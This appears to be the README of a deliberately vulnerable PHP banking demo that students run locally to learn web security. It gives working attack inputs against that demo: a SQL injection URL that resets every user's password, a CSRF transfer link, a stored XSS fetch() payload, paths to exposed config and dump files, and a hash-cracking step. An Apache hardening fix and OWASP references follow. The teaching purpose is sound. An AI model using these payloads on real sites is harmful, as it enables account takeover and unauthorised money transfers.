- designed for students of KIV/WEB of University of West Bohemia
- Install Docker
- Install Docker Compose
- Clone this repository
git clone https://github.com/intraworlds/zcu-security-demo.git
or download ZIP file
- run
docker-compose up
and you access the website
- app: http://localhost:8088/
- username:
willis.ritchie@example.com
- password:
richie
- adminer: http://localhost:8086/?server=mysql&username=admin&db=zcu_demo
- password:
1234
Note: It'll take a minute to build docker container - be patient.
- go to http://localhost:8088/?path=list&limit=50;update%20users%20set%20name=email,password=%27%242y%2410%24vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze%27;
- notice added command
update users set name=email,password='$2y$10$vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze'
- refresh page
- observe that all users are named by its email and theirs password is
123
- so now you can access any account and transfer a money
- goto http://localhost:8088/?path=create&receiver=1&amount=1&desc=❤️&submit=create
- observe that 1 IW coin was transfered to user #1 without your consent
- goto http://localhost:8088/?path=create
- create new transaction with following description
❤️
<script>
fetch("/?path=create&receiver=1&amount=1&desc=❤️&submit=create");
</script>
- observe that now everybody who visits list of transactions will send a coin to user #1 without consent
try following URLs
- http://localhost:8088/docker-compose.yml
- http://localhost:8088/config/app.env
- http://localhost:8088/dumps/zcu_demo.sql
Adjust apache configuration
# denied all files
<RequireAll>
Require all denied
</RequireAll>
# whitelist only *.php and other files
<FilesMatch "((^$)|(^.+\.(php|css|map|js)$))">
Require all granted
</FilesMatch>
try use hashcat
php scripts/crack_md5_hash.php 75b71aa6842e450f12aca00fdf54c51d
Show all running containers
docker-compose ps
See logs
docker-compose logs -f
Connect container
docker-compose exec apache bash -l
- OWASP SQL injection
- Soom: SQL Injection (Full Paper) (czech only)
- PHP triky: Obrana proti SQL Injection (czech only)
- OWASP CSFR
- Soom (czech only)
- PHP triky: Cross-Site Request Forgery (czech only)
- Co je Cross-Site Request Forgery a jak se mu bránit (czech only)